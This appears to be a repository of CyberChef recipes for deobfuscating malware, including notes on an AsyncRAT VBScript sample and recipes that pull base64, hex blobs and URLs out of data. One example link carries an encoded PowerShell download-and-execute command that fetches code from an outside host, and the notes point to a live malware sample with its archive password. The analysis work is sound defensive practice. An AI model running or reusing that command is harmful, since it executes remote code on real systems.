├── README.md ├── Twitter └── 2023-03-22-AsyncRAT-Vbs-Script.txt ├── extract_base64.json ├── extract_base64_from_dns_txt_records.txt └── extract_url_from_hex_blob.json /README.md: -------------------------------------------------------------------------------- 1 | # CyberChef Recipes 2 | 3 | A list of CyberChef recipes that I have found useful. 4 | 5 | These are in a .json format that can be copy/pasted, or otherwise imported into CyberChef for re-use (the .json files here also contain comment lines and a Chef-format listing, so paste only the bracketed JSON array when importing). 6 | -------------------------------------------------------------------------------- /Twitter/2023-03-22-AsyncRAT-Vbs-Script.txt: -------------------------------------------------------------------------------- 1 | 2 | Malware Hash: 07e25cb7d427ac047f53b3badceacf6fc5fb395612ded5d3566a09800499cd7d 3 | Link: https://bazaar.abuse.ch/sample/26c9f29fceaee8b13ba0fe4d7170f50c8046e43e11e461a43ce92b22d8e24bf5/ (note: the hash in this link differs from the Malware Hash listed above; confirm which sample is intended before relying on either) 4 | PW: infected 5 | 6 | Recipes can be imported into CyberChef 7 | 8 | # Part 1: Decimal Decoding (Link) 9 | https://gchq.github.io/CyberChef/#recipe=Subsection('%22?%26?chr%5C%5C(%5C%5Cd%2B%5C%5C)%26?%22?',true,true,false)Regular_expression('User%20defined','%5C%5Cd%2B',true,true,false,false,false,false,'List%20matches')From_Decimal('Space',false)Merge(true)Find_/_Replace(%7B'option':'Regex','string':'%22%5B%5C%5C%2B%26%5D%22'%7D,'',true,false,true,false)Syntax_highlighter('auto%20detect') 10 | 11 | # Part 1: Decimal Decoding (Recipe) 12 | 13 | Subsection('"?&?chr\\(\\d+\\)&?"?',true,true,false) 14 | Regular_expression('User defined','\\d+',true,true,false,false,false,false,'List matches') 15 | From_Decimal('Space',false) 16 | Merge(true) 17 | Find_/_Replace({'option':'Regex','string':'"[\\+&]"'},'',true,false,true,false) 18 | Syntax_highlighter('auto detect') 19 | 20 | 21 | # Part 2: Removing String Reverse (Link) 22 | 
https://gchq.github.io/CyberChef/#recipe=Subsection('StrReverse%5C%5C(%22.%7B10,50%7D%22%5C%5C)',true,true,false)Regular_expression('User%20defined','%22.*%22',true,true,false,false,false,false,'List%20matches')Reverse('Character')Merge(true)Syntax_highlighter('vbscript') 23 | 24 | 25 | # Part 2: Removing String Reverse (Recipe) 26 | 27 | Subsection('StrReverse\\(".{10,50}"\\)',true,true,false) 28 | Regular_expression('User defined','".*"',true,true,false,false,false,false,'List matches') 29 | Reverse('Character') 30 | Merge(true) 31 | Syntax_highlighter('vbscript') 32 | 33 | 34 | # Part 3: Removing Replace Operations (Link) 35 | https://gchq.github.io/CyberChef/#recipe=Subsection('Replace%5C%5C(%22%5B%5E,%22%5D%2B%22,%22%5B%5E,%22%5D%2B%22,%22.%22%5C%5C)',true,true,false)Escape_string('Special%20chars','Single',false,true,false)Register('Replace%5C%5C((%22%5B%5E,%22%5D%2B%22),%22(%5B%5E,%22%5D%2B)%22,%22(.)%22%5C%5C)',true,false,false)Regular_expression('User%20defined','$R0',true,true,false,false,false,false,'List%20matches')Find_/_Replace(%7B'option':'Regex','string':'$R1'%7D,'$R2',true,false,false,true)Merge(true)Syntax_highlighter('vbscript') 36 | 37 | # Part 3: Removing Replace Operations (Recipe) 38 | 39 | Subsection('Replace\\("[^,"]+","[^,"]+","."\\)',true,true,false) 40 | Escape_string('Special chars','Single',false,true,false) 41 | Register('Replace\\(("[^,"]+"),"([^,"]+)","(.)"\\)',true,false,false) 42 | Regular_expression('User defined','$R0',true,true,false,false,false,false,'List matches') 43 | Find_/_Replace({'option':'Regex','string':'$R1'},'$R2',true,false,false,true) 44 | Merge(true) 45 | Syntax_highlighter('vbscript') 46 | 47 | 48 | 49 | -------------------------------------------------------------------------------- /extract_base64.json: -------------------------------------------------------------------------------- 1 | # Extracts base64 blobs from input data, lists the base64 decoded blobs in output 2 | 3 | 4 | #### Clean Json 5 | [ 6 | { 
"op": "Regular expression", 7 | "args": ["User defined", "[a-z0-9\\=\\+\\/]{100,}", true, true, false, false, false, false, "List matches"] }, 8 | { "op": "Fork", 9 | "args": ["\\n", "\\n", false] }, 10 | { "op": "From Base64", 11 | "args": ["A-Za-z0-9+/=", true, false] }, 12 | { "op": "Remove null bytes", 13 | "args": [] } 14 | ] 15 | 16 | 17 | ### Chef Format 18 | Regular_expression('User defined','[a-z0-9\\=\\+\\/]{100,}',true,true,false,false,false,false,'List matches') 19 | Fork('\\n','\\n',false) 20 | From_Base64('A-Za-z0-9+/=',true,false) 21 | Remove_null_bytes() 22 | 23 | 24 | # Link with example data 25 | https://gchq.github.io/CyberChef/#recipe=Regular_expression('User%20defined','%5Ba-z0-9%5C%5C%3D%5C%5C%2B%5C%5C/%5D%7B100,%7D',true,true,false,false,false,false,'List%20matches')Fork('%5C%5Cn','%5C%5Cn',false)From_Base64('A-Za-z0-9%2B/%3D',true,false)Remove_null_bytes()&input=QzpcV2luZG93c1xTeXN0ZW0zMlxXaW5kb3dzUG93ZXJTaGVsbFx2MS4wXHBvd2Vyc2hlbGwuRVhFIC1ub3AgLWVwIGJ5cGFzcyAtZSBTUUJGQUZnQUlBQW9BRTRBWlFCM0FDMEFUd0JpQUdvQVpRQmpBSFFBSUFCT0FHVUFkQUF1QUZjQVpRQmlBRU1BYkFCcEFHVUFiZ0IwQUNrQUxnQmtBRzhBZHdCdUFHd0Fid0JoQUdRQWN3QjBBSElBYVFCdUFHY0FLQUFuQUdnQWRBQjBBSEFBT2dBdkFDOEFjQUF1QUdVQWN3QjBBRzhBYmdCcEFHNEFaUUF1QUdNQWJ3QnRBQzhBY0FBL0FITUFiUUJpQUNjQUtRQT0K 26 | -------------------------------------------------------------------------------- /extract_base64_from_dns_txt_records.txt: -------------------------------------------------------------------------------- 1 | #Example Data 2 | 3 | https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Regex','string':'_'%7D,'%2B',true,false,true,false)Regular_expression('User%20defined','%5Ba-zA-Z0-9%5C%5C%3D%5C%5C%2B%5C%5C/%5D%7B50,%7D',false,true,false,false,false,false,'List%20matches')Fork('%5C%5Cn','%5C%5Cn',false)From_Base64('A-Za-z0-9%2B/%3D',true,false)&input=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 4 | 5 | #Chef Format 6 | 7 | 
Find_/_Replace({'option':'Regex','string':'_'},'+',true,false,true,false) 8 | Regular_expression('User defined','[a-zA-Z0-9\\=\\+\\/]{50,}',false,true,false,false,false,false,'List matches') 9 | Fork('\\n','\\n',false) 10 | From_Base64('A-Za-z0-9+/=',true,false) 11 | 12 | #Clean JSON 13 | 14 | [ 15 | { "op": "Find / Replace", 16 | "args": [{ "option": "Regex", "string": "_" }, "+", true, false, true, false] }, 17 | { "op": "Regular expression", 18 | "args": ["User defined", "[a-zA-Z0-9\\=\\+\\/]{50,}", false, true, false, false, false, false, "List matches"] }, 19 | { "op": "Fork", 20 | "args": ["\\n", "\\n", false] }, 21 | { "op": "From Base64", 22 | "args": ["A-Za-z0-9+/=", true, false] } 23 | ] 24 | 25 | #Compact JSON 26 | 27 | [{"op":"Find / Replace","args":[{"option":"Regex","string":"_"},"+",true,false,true,false]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9\\=\\+\\/]{50,}",false,true,false,false,false,false,"List matches"]},{"op":"Fork","args":["\\n","\\n",false]},{"op":"From Base64","args":["A-Za-z0-9+/=",true,false]}] 28 | -------------------------------------------------------------------------------- /extract_url_from_hex_blob.json: -------------------------------------------------------------------------------- 1 | # Extracts all blobs of hex data, then decodes them and extracts the unique URLs 2 | # (e.g. from blobs that look like $aXoTDkd = '0d 0a 40 65 63 68 6f 20 6f') 3 | 4 | 5 | # Clean Json 6 | [ 7 | { "op": "Regular expression", 8 | "args": ["User defined", "([a-f0-9]{2}[\\s,]*){15,}", true, true, false, false, false, false, "List matches"] }, 9 | { "op": "Fork", 10 | "args": ["\\n", "\\n", false] }, 11 | { "op": "Find / Replace", 12 | "args": [{ "option": "Regex", "string": "," }, " ", true, false, true, false] }, 13 | { "op": "From Hex", 14 | "args": ["Auto"] }, 15 | { "op": "Merge", 16 | "args": [true] }, 17 | { "op": "Extract URLs", 18 | "args": [false, true, true] } 19 | ] 20 | 21 | 22 | # Chef Format 23 | Regular_expression('User 
defined','([a-f0-9]{2}[\\s,]*){15,}',true,true,false,false,false,false,'List matches') 24 | Fork('\\n','\\n',false) 25 | Find_/_Replace({'option':'Regex','string':','},' ',true,false,true,false) 26 | From_Hex('Auto') 27 | Merge(true) 28 | Extract_URLs(false,true,true) 29 | 30 | 31 | # Link 32 | https://gchq.github.io/CyberChef/#recipe=Regular_expression('User%20defined','(%5Ba-f0-9%5D%7B2%7D%5B%5C%5Cs,%5D*)%7B15,%7D',true,true,false,false,false,false,'List%20matches')Fork('%5C%5Cn','%5C%5Cn',false)Find_/_Replace(%7B'option':'Regex','string':','%7D,'%20',true,false,true,false)From_Hex('Auto')Merge(true)Extract_URLs(false,true,true) 33 | --------------------------------------------------------------------------------